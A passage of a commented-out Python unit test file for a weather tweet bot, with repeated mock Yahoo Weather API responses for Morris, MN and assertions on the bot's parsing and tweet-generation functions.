'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '', 'speed': ''}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weather_data['windSpeed'], 0.0)
# self.assertEqual(weather_data['wind_direction'], 'N')
# self.assertEqual(weather_data['apparentTemperature'], 37)
# self.assertEqual(weather_data['windSpeed_and_unit'], '0 mph')
# self.assertEqual(weather_data['humidity'], 70)
# self.assertEqual(weather_data['temp'], 43)
# self.assertEqual(weather_data['code'], 33)
# self.assertEqual(weather_data['condition'], 'fair')
# self.assertEqual(weather_data['deg_unit'], deg + 'F')
# self.assertEqual(weather_data['temp_and_unit'], '43' + deg + 'F')
# self.assertEqual(weather_data['city'], 'Morris')
# self.assertEqual(weather_data['region'], 'MN')
# self.assertEqual(weather_data['latitude'], '45.59')
# self.assertEqual(weather_data['longitude'], '-95.9')
# self.assertEqual(weather_data['forecast'], [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}])
# self.assertTrue(weather_data['valid'])
#
# def test_get_weather_variables_error(self):
# """Testing if getting weather variables with a malformed input is valid"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {}, 'count': 1}}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertFalse(weather_data['valid'])
#
# def test_normal_tweet(self):
# """Testing if normal tweet contains the condition and temperature"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# returned = weatherBot.make_normal_tweet(weather_data)
# self.assertTrue('fair' in returned)
# self.assertTrue('43' + deg + 'F' in returned)
#
# def test_make_special_tweet_normal(self):
# """Testing if normal event is triggered"""
# weather_data = weatherBot.get_weather_variables(ydataNorm)
# self.assertEqual(weatherBot.make_special_tweet(weather_data), 'normal')
#
# def test_make_special_tweet_error3200(self):
# """Testing if weather code is 3200/an error event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '3200', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data), 'Someone messed up, apparently the current condition is \"not available\" http://www.reactiongifs.com/wp-content/uploads/2013/08/air-quotes.gif')
#
# def test_make_special_tweet_very_hot(self):
# """Testing if very hot temperatures event is triggered"""
# ydata_f = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '100', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '95', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_f = weatherBot.get_weather_variables(ydata_f)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_f), 'Holy moly it\'s 100' + deg + 'F. I could literally (figuratively) melt.')
# ydata_c = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '37', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '35', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_c = weatherBot.get_weather_variables(ydata_c)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_c), 'Holy moly it\'s 37' + deg + 'C. I could literally (figuratively) melt.')
# ydata_c2 = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '52', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '35', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_c2 = weatherBot.get_weather_variables(ydata_c2)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_c2), 'normal')
#
# def test_make_special_tweet_cold(self):
# """Testing if cold temperatures event is triggered"""
# ydata_f = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '-22', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_f = weatherBot.get_weather_variables(ydata_f)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_f), 'It\'s -22' + deg + 'F. Too cold.')
# ydata_c = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '-30', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'km/h', 'temperature': 'C', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-33', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_c = weatherBot.get_weather_variables(ydata_c)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_c), 'It\'s -30' + deg + 'C. Too cold.')
#
# def test_make_special_tweet_low_humidity(self):
# """Testing if low humidity event is triggered"""
# ydata = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '4', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '3200', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '37', 'direction': '310', 'speed': '9'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data = weatherBot.get_weather_variables(ydata)
# self.assertEqual(weatherBot.make_special_tweet(weather_data), 'It\'s dry as strained pasta. 4% humid right now.')
#
# def test_make_special_tweet_high_wind(self):
# """Testing if high wind event is triggered"""
# ydata_f = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br />\nFri - Partly Cloudy. High: 46 Low: 28<br />\nSat - Mostly Sunny. High: 57 Low: 32<br />\nSun - Partly Cloudy. High: 52 Low: 29<br />\n<br />\n<a href="http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html">Full Forecast at Yahoo! Weather</a><BR/><BR/>\n(provided by <a href="http://www.weather.com" >The Weather Channel</a>)<br/>\n', 'guid': {'isPermaLink': 'false', 'content': 'USMN0518_2015_04_05_7_00_CDT'}, 'condition': {'temp': '43', 'date': 'Thu, 02 Apr 2015 12:33 am CDT', 'code': '33', 'text': 'Fair'}, 'long': '-95.9', 'title': 'Conditions for Morris, MN at 12:33 am CDT', 'pubDate': 'Thu, 02 Apr 2015 12:33 am CDT'}, 'location': {'country': 'United States', 'city': 'Morris', 'region': 'MN'}, 'units': {'speed': 'mph', 'temperature': 'F', 'pressure': 'in', 'distance': 'mi'}, 'wind': {'chill': '-26', 'direction': '310', 'speed': '35'}, 'ttl': '60', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'lastBuildDate': 'Thu, 02 Apr 2015 12:33 am CDT', 'description': 'Yahoo! Weather for Morris, MN', 'astronomy': {'sunrise': '7:03 am', 'sunset': '7:49 pm'}, 'title': 'Yahoo! Weather - Morris, MN', 'language': 'en-us'}}, 'count': 1}}
# weather_data_f = weatherBot.get_weather_variables(ydata_f)
# self.assertEqual(weatherBot.make_special_tweet(weather_data_f),
# 'Hold onto your hats, the wind is blowing at 35 mph coming from the NW.')
# ydata_c = {'query': {'lang': 'en-US', 'created': '2015-04-02T05:49:55Z', 'results': {'channel': {'image': {'link': 'http://weather.yahoo.com', 'width': '142', 'url': 'http://l.yimg.com/a/i/brand/purplelogo//uh/us/news-wea.gif', 'height': '18', 'title': 'Yahoo! Weather'}, 'atmosphere': {'rising': '1', 'visibility': '10', 'humidity': '70', 'pressure': '29.67'}, 'item': {'lat': '45.59', 'link': 'http://us.rd.yahoo.com/dailynews/rss/weather/Morris__MN/*http://weather.yahoo.com/forecast/USMN0518_f.html', 'forecast': [{'low': '40', 'text': 'Partly Cloudy', 'high': '73', 'day': 'Wed', 'date': '1 Apr 2015', 'code': '29'}, {'low': '23', 'text': 'Partly Cloudy/Wind', 'high': '59', 'day': 'Thu', 'date': '2 Apr 2015', 'code': '24'}, {'low': '28', 'text': 'Partly Cloudy', 'high': '46', 'day': 'Fri', 'date': '3 Apr 2015', 'code': '30'}, {'low': '32', 'text': 'Mostly Sunny', 'high': '57', 'day': 'Sat', 'date': '4 Apr 2015', 'code': '34'}, {'low': '29', 'text': 'Partly Cloudy', 'high': '52', 'day': 'Sun', 'date': '5 Apr 2015', 'code': '30'}], 'description': '\n<img src="http://l.yimg.com/a/i/us/we/52/33.gif"/><br />\n<b>Current Conditions:</b><br />\nFair, 43 F<BR />\n<BR /><b>Forecast:</b><BR />\nWed - Partly Cloudy. High: 73 Low: 40<br />\nThu - Partly Cloudy/Wind. High: 59 Low: 23<br 